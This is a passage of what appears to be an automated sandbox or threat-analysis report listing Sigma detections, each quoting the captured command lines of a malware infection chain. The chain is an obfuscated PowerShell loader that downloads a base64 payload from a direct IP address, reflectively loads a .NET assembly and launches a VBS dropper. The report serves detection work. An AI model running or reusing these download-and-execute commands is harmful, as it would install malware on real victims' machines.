;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;,
                  Sigma detected: Suspicious Encoded PowerShell Command Line
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, ProcessId: 7396, ProcessName: powershell.exe
                  Sigma detected: Suspicious Invoke-WebRequest Execution
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 3644, ProcessName: wscript.exe
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: Suspicious Execution of Powershell with Base64
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text, ProcessId: 7396, ProcessName: powershell.exe
                  Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??W
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
